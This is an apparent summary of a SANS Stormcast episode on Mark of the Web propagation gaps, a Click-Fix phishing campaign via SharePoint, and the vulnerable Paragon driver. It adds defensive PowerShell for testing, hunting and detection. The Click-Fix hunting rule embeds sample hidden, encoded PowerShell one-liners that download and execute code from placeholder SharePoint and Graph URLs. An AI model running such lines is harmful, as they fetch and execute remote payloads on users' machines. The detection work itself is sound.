Episode Overview
Podcast: SANS Internet Stormcenter Daily Cyber Security Podcast (Stormcast)
Host: Johannes B. Ullrich
Episode Date: March 4, 2025
Episode Theme:
A concise briefing on three current issues: new findings on how Windows' "Mark of the Web" fails to propagate through archives and disk images, a "Click-Fix" phishing campaign that delivers its payload through SharePoint, and a vulnerable signed kernel driver shipped with Paragon Partition Manager that ransomware actors are now abusing (bring your own vulnerable driver).
Key Discussion Points & Insights
1. Mark of the Web – Deep Dive & Limitations
[00:36 - 02:20]
- Background: the "Mark of the Web" (MotW) tags files that were downloaded from the Internet so that Windows (the "Open File - Security Warning" prompt, SmartScreen, Office Protected View) can warn before the user runs or opens them.
- Implemented as an NTFS alternate data stream (ADS) named Zone.Identifier that records the URL security zone the file came from (ZoneId 0-4; 3 = Internet is the value that triggers the warning).
- Propagation Issues:
- MotW is not reliably carried across format boundaries: archive extractors, image mounters and other utilities may not copy the stream onto the files they produce.
- Example: ZIP extraction and ISO images can strip MotW ("didn't get properly propagated to different file formats..." [00:19]).
- Technical Details:
- The ADS always holds the ZoneId and, depending on the browser, the download URL and referrer as well (the HostUrl and ReferrerUrl fields).
- Incognito/private browser modes may omit the URL fields so that browsing history does not leak into the file system.
- Practical Tip/Hack:
- The alternate data stream can be opened directly in Notepad by appending a colon and the stream name (Zone.Identifier) to the file name on Notepad's command line.
- Quote: “...the little hack how you look at the content of the Mark of the Web at that alternative data stream just in Notepad...” (Johannes, [01:35])
- Notable Insights:
- Inconsistent propagation means the controls that key off MotW (SmartScreen prompts, Office Protected View, attachment warnings) silently fail for files that arrive inside a container; treat MotW as one layer of defense-in-depth, not as a gate.
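The following PowerShell is an added example, not code from the episode or from Microsoft: it writes a Zone.Identifier stream by hand, reads it back, parses the ZoneId, and then runs a marked file through Compress-Archive/Expand-Archive to test whether the mark survives extraction. It assumes an NTFS volume and Windows PowerShell 5.1 or later; the file names and URLs are illustrative.

```powershell
# Added example, not from the Stormcast episode: read, write and test propagation of
# the Mark of the Web, which is the NTFS alternate data stream "Zone.Identifier".
# Assumes an NTFS volume and Windows PowerShell 5.1+; all file names/URLs are illustrative.

$work = Join-Path $env:TEMP 'motw-demo'
New-Item -ItemType Directory -Path $work -Force | Out-Null
$payload = Join-Path $work 'tool.exe'
Set-Content -Path $payload -Value 'placeholder, not a real executable'

# 1. Write a MotW by hand, as a browser would. ZoneId 3 = Internet
#    (0 Local Machine, 1 Intranet, 2 Trusted, 4 Restricted). ReferrerUrl and HostUrl
#    are the optional origin fields some browsers add; these URLs are made up.
$motw = @"
[ZoneTransfer]
ZoneId=3
ReferrerUrl=https://example.test/downloads/
HostUrl=https://cdn.example.test/tool.exe
"@
Set-Content -Path $payload -Stream 'Zone.Identifier' -Value $motw

# 2. Read it back. The Notepad trick from the episode opens the same stream:
#    notepad.exe "C:\path\to\tool.exe:Zone.Identifier"
Get-Item -Path $payload -Stream '*' | Select-Object Stream, Length
Get-Content -Path $payload -Stream 'Zone.Identifier'

# 3. Parse the ZoneId so a script can decide whether a file still counts as "from the Internet".
function Get-MotWZoneId {
    param([Parameter(Mandatory)][string]$Path)
    try {
        $lines = Get-Content -Path $Path -Stream 'Zone.Identifier' -ErrorAction Stop
    } catch {
        return $null    # no Zone.Identifier stream at all: the mark is gone
    }
    foreach ($line in $lines) {
        if ($line -match '^ZoneId=(\d+)\s*$') { return [int]$Matches[1] }
    }
    return $null        # stream exists but carries no ZoneId line
}

# 4. Propagation check: zip the marked file, mark the ZIP itself as downloaded, extract,
#    and see whether the extracted copy still carries ZoneId 3. Run the same ZIP through
#    Explorer or a third-party extractor and compare; tools differ, which is the problem.
$zip = Join-Path $work 'tool.zip'
Compress-Archive -Path $payload -DestinationPath $zip -Force
Set-Content -Path $zip -Stream 'Zone.Identifier' -Value $motw
$out = Join-Path $work 'extracted'
Expand-Archive -Path $zip -DestinationPath $out -Force

Get-ChildItem -Path $out -File | ForEach-Object {
    $zone = Get-MotWZoneId -Path $_.FullName
    [pscustomobject]@{
        File     = $_.Name
        ZoneId   = $zone
        IsMarked = ($null -ne $zone -and $zone -ge 3)   # 3 = Internet, 4 = Restricted
    }
}

# 5. Unblock-File deletes the stream; it is the scripted form of the "Unblock" checkbox.
#    Unblock-File -Path $payload
```

Get-MotWZoneId returns `$null` both when the stream is missing and when it carries no ZoneId line, so callers treat "unknown" the same as "unmarked", which is also how Windows behaves: no ZoneId, no warning.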
2. Click-Fix Phishing via SharePoint and HTML Attachments
[02:20 - 03:53]
- Attack Vector:
- Recently observed phishing delivers an HTML file as the e-mail attachment, a vector Johannes notes is becoming more common ("something that I've actually seen more and more recently..." [02:32]).
- Fortinet researchers describe the technique under the name "Click-Fix".
- Attack Flow:
- The user opens the HTML attachment and sees a fake error message with instructions to copy a "fix" (typically a PowerShell one-liner) and paste it into their own system.
- The HTML carries no executable content (no JavaScript, no embedded payload), so mail gateways that look for active content often let it through.
- The pasted command fetches the real payload from an attacker-controlled SharePoint site through Microsoft's Graph API.
- Unique Aspects:
- Relies on the user to execute the code themselves: no exploit, macro or dropper is needed.
- SharePoint and Graph API traffic blends into normal Microsoft 365 usage, so URL reputation and egress filtering rarely flag it:
- Quote: “all the interaction with SharePoint of course may not necessarily trigger alerts because that's usually considered a valid business resource...” (Johannes, [03:30])
- Impact/Risk:
- Users who follow the instructions walk past the controls (attachment sandboxing, macro blocking, download warnings) that sit in front of conventional malware delivery.
- Defenders cannot simply block SharePoint or the Graph API, so detection has to move to the endpoint: PowerShell spawned from an interactive shell with a command line that downloads and executes.
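As an added example, not from the episode or Fortinet's report, here is an endpoint hunting rule for the stage where the user pastes the "fix": it scores process-creation records (field names follow Sysmon Event ID 1) on the combination of an interactive parent, a hidden or encoded PowerShell invocation, download-and-execute, and a SharePoint or Graph API URL. The three records are constructed, the SharePoint and Graph URLs are placeholders, and the RunMRU check at the end assumes the lure used the Win+R Run dialog, which is common for Click-Fix but not stated in the episode.

```powershell
# Added example, not from the episode or Fortinet's report: hunting rule for the
# "paste this into your machine" stage of a Click-Fix chain. Fields follow Sysmon
# Event ID 1 (ParentImage, Image, CommandLine). Records are constructed; the
# SharePoint/Graph URLs are placeholders, not real campaign infrastructure.

$ps = 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe'

# Build an -EncodedCommand sample the honest way (UTF-16LE, base64) instead of guessing one.
$encoded = [Convert]::ToBase64String(
    [Text.Encoding]::Unicode.GetBytes('iex (iwr https://graph.microsoft.com/v1.0/sites/placeholder/drive/items/x/content).Content'))

$records = @(
    [pscustomobject]@{ ParentImage = 'C:\Windows\explorer.exe'; Image = $ps
                       CommandLine = 'powershell -w hidden -c "iex (iwr https://contoso-my.sharepoint.com/personal/x/stage1.txt).Content"' }
    [pscustomobject]@{ ParentImage = 'C:\Windows\explorer.exe'; Image = $ps
                       CommandLine = "powershell -nop -w hidden -enc $encoded" }
    [pscustomobject]@{ ParentImage = 'C:\Windows\System32\cmd.exe'; Image = $ps
                       CommandLine = 'powershell -ExecutionPolicy Bypass -File C:\Scripts\nightly-backup.ps1' }  # benign admin task
)

function Test-ClickFixProcess {
    param([Parameter(Mandatory)]$Record)
    $cmd = [string]$Record.CommandLine
    $reasons = @()

    # Decode -EncodedCommand first so the URL and iex checks see the real script.
    if ($cmd -match '(?i)\s-(e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)') {
        $reasons += 'encoded command'
        try { $cmd += ' ' + [Text.Encoding]::Unicode.GetString([Convert]::FromBase64String($Matches[2])) } catch { }
    }
    # Explorer as parent is what a user pasting into the Run dialog looks like.
    if ($Record.ParentImage -match '(?i)\\explorer\.exe$')        { $reasons += 'launched from Explorer (user paste)' }
    if ($cmd -match '(?i)\s-(w|win|windowstyle)\s+hidden')         { $reasons += 'hidden window' }
    if ($cmd -match '(?i)\b(iex|invoke-expression)\b')             { $reasons += 'download-and-execute (iex)' }
    if ($cmd -match '(?i)https?://\S*(sharepoint\.com|graph\.microsoft\.com)') { $reasons += 'fetches from SharePoint/Graph API' }

    # Require the "user pasted it" signal plus at least one fetch/execute signal;
    # that keeps scheduled and admin PowerShell out of the result set.
    $fromUser = [bool]($reasons -match 'Explorer')
    $fetches  = [bool]($reasons -match 'iex|SharePoint|encoded')
    [pscustomobject]@{
        Suspicious  = ($fromUser -and $fetches)
        Reasons     = ($reasons -join '; ')
        CommandLine = $Record.CommandLine
    }
}

$records | ForEach-Object { Test-ClickFixProcess -Record $_ } | Format-Table -AutoSize -Wrap

# Corroborating artifact on the endpoint: the Run dialog keeps its history under RunMRU,
# so a pasted one-liner usually survives there even after the process is gone.
Get-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU' -ErrorAction SilentlyContinue |
    Select-Object -Property * -ExcludeProperty PS*, MRUList
```

The rule deliberately does not alert on SharePoint or Graph URLs alone, since those are legitimate traffic in any Microsoft 365 tenant; it is the pairing with an interactive parent and an execute primitive that separates the lure from normal use.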
3. Paragon Partition Manager BYOVD (Bring Your Own Vulnerable Driver) Exploit
[03:53 - 05:13]
- Vulnerability:
- The kernel driver shipped with Paragon Partition Manager (BioNTdrv.sys) in versions before 2.0.0 contains multiple vulnerabilities.
- One of them (CVE-2025-0289, added to CISA's Known Exploited Vulnerabilities catalog) is now being exploited by ransomware groups for privilege escalation.
- Seriousness:
- It is a digitally signed kernel driver: Windows loads it without complaint on a default install, and a flaw in it gives the attacker read/write access to kernel memory.
- Exploitable even on machines where nobody installed the software: an attacker who already holds administrative rights can drop the driver and load it themselves ("bring your own vulnerable driver"), then use it to reach kernel level, typically to disable EDR or tamper with protected processes.
- Quote: "This is even a problem if you never installed this software because an attacker may install that driver for you and then use it for privilege escalation." (Johannes, [04:15])
- Mitigations:
- Microsoft added the driver to its vulnerable driver blocklist (the Microsoft-recommended driver block rules, enforced through Windows Defender Application Control and HVCI).
- The blocklist is only as good as its update cadence: it ships with Windows updates, enforcement depends on the platform configuration, and it has lagged in the past.
- Quote: "But there have been issues with that vulnerable driver block list in the past, so not sure how well this works these days." (Johannes, [04:53])
- Add your own detections (driver file name, hash and signer) to EDR/AV and to driver-load monitoring so old versions are blocked, or at least alerted on, rather than relying on the Microsoft list alone.
- Advice:
- Urgent: upgrade Paragon Partition Manager if you run it, and hunt for the driver on every endpoint regardless, since attackers bring it with them.
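As an added example, not from the episode or the advisory, the following PowerShell hunts a host for the Paragon driver whether or not the product is installed: it lists any kernel service that points at the file, locates copies on disk and compares their version with the fixed release, records the hash and signer for your own block rules, pulls driver-load and service-install events, and checks whether HVCI, one of the enforcement paths for Microsoft's blocklist, is actually running. The driver name BioNTdrv.sys and the fixed version 2.0.0 are from the public advisory; everything else is standard Windows tooling.

```powershell
# Added example, not from the episode: hunt for the vulnerable Paragon driver on a host
# whether or not Paragon Partition Manager is installed, and collect the evidence of it
# being loaded. Driver name BioNTdrv.sys and fixed version 2.0.0 come from the public
# advisory; the paths and event sources are standard Windows locations.

$driverName   = 'BioNTdrv.sys'
$fixedVersion = [version]'2.0.0.0'

# 1. Registered kernel services. A BYOVD loader gets the driver in by creating a service
#    (CreateService / sc create), so this is the authoritative list of load paths.
$services = @(Get-CimInstance -ClassName Win32_SystemDriver |
    Where-Object { $_.PathName -match [regex]::Escape($driverName) } |
    Select-Object Name, State, StartMode, PathName)

# 2. Copies on disk: the usual driver directories plus whatever path each service points at
#    (service PathName comes in several spellings: \??\C:\..., \SystemRoot\..., System32\...).
$onDisk = @(Get-ChildItem -Path "$env:SystemRoot\System32\drivers", "$env:SystemRoot\System32\DriverStore" `
    -Filter $driverName -Recurse -File -ErrorAction SilentlyContinue)
foreach ($svc in $services) {
    $p = $svc.PathName -replace '^\\\?\?\\', ''
    $p = $p -replace '^\\SystemRoot', $env:SystemRoot
    $p = $p -replace '^System32', "$env:SystemRoot\System32"
    $item = Get-Item -LiteralPath $p -ErrorAction SilentlyContinue
    if ($item) { $onDisk += $item }
}

$files = foreach ($f in ($onDisk | Sort-Object FullName -Unique)) {
    $vi  = $f.VersionInfo
    $ver = [version]"$($vi.FileMajorPart).$($vi.FileMinorPart).$($vi.FileBuildPart).$($vi.FilePrivatePart)"
    $sig = Get-AuthenticodeSignature -FilePath $f.FullName
    [pscustomobject]@{
        Path       = $f.FullName
        Version    = $ver
        Vulnerable = ($ver -lt $fixedVersion)
        SHA256     = (Get-FileHash -Path $f.FullName -Algorithm SHA256).Hash   # for your EDR/AV block rule
        Signer     = $sig.SignerCertificate.Subject                           # signed, and still dangerous: the BYOVD point
        SigStatus  = $sig.Status
    }
}

# 3. Evidence of loading or installation. Sysmon Event ID 6 (DriverLoad) needs Sysmon;
#    System event 7045 (a new service was installed) is written by Windows itself.
$loadEvents = @(
    Get-WinEvent -FilterHashtable @{ LogName = 'Microsoft-Windows-Sysmon/Operational'; Id = 6 } -ErrorAction SilentlyContinue
    Get-WinEvent -FilterHashtable @{ LogName = 'System'; Id = 7045 } -ErrorAction SilentlyContinue
) | Where-Object { $_.Message -match [regex]::Escape($driverName) } |
    Select-Object TimeCreated, Id, Message

# 4. Is the Microsoft blocklist in a position to help? HVCI (memory integrity) is one of the
#    enforcement paths; the list itself ships with Windows updates, so a newly listed driver
#    is not blocked until the update lands, which is the caveat raised in the episode.
$dg   = Get-CimInstance -Namespace 'root\Microsoft\Windows\DeviceGuard' -ClassName Win32_DeviceGuard
$hvci = [bool]($dg.SecurityServicesRunning -contains 2)   # 2 = HVCI in Win32_DeviceGuard

[pscustomobject]@{
    DriverServices = $services
    DriverFiles    = $files
    LoadEvents     = $loadEvents
    HvciRunning    = $hvci
}
```

Run it under an elevated session so the service list and the Sysmon channel are readable; a hit in DriverServices or LoadEvents on a machine that never had Paragon installed is the BYOVD case the episode warns about, and the SHA256 and Signer columns are the values to feed into a custom block rule.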
Notable Quotes & Memorable Moments
- “The purpose of the Mark of the Web is to indicate to the system that this file has been downloaded from the Internet, so the user can be presented with a warning if this file is executable...” (Johannes, [00:24])
- “Yes, users will do this. The user here doesn't really realize what they're doing, of course, and that will execute then a PowerShell script that installs additional malware.” (Johannes, [02:47])
- “The user here essentially exploits themselves by copy-pasting that PowerShell script.” (Johannes, [03:19])
- "So first of all, yes, you should update Paragon Partition Manager if you run it, but this is even a problem if you never installed this software because an attacker may install that driver for you and then use it for privilege escalation." (Johannes, [04:12])
Key Timestamps
- 00:36 — Introduction to Mark of the Web, propagation problems
- 01:35 — Inspecting the alternate data stream in Notepad
- 02:20 — Fortinet’s “Click-Fix” phishing campaign overview
- 02:47 — User exploitation via PowerShell copy-paste
- 03:30 — SharePoint and Graph API’s role; evasion of defenses
- 03:53 — Paragon Partition Manager’s vulnerable driver explained
- 04:12 — Drivers can be introduced even if software isn’t installed
- 04:53 — Microsoft block list caveats and upgrade recommendations
Tone
Technical, to-the-point, with moments of practical advice and warnings for defenders; Johannes maintains a direct and informative delivery style suitable for security professionals.
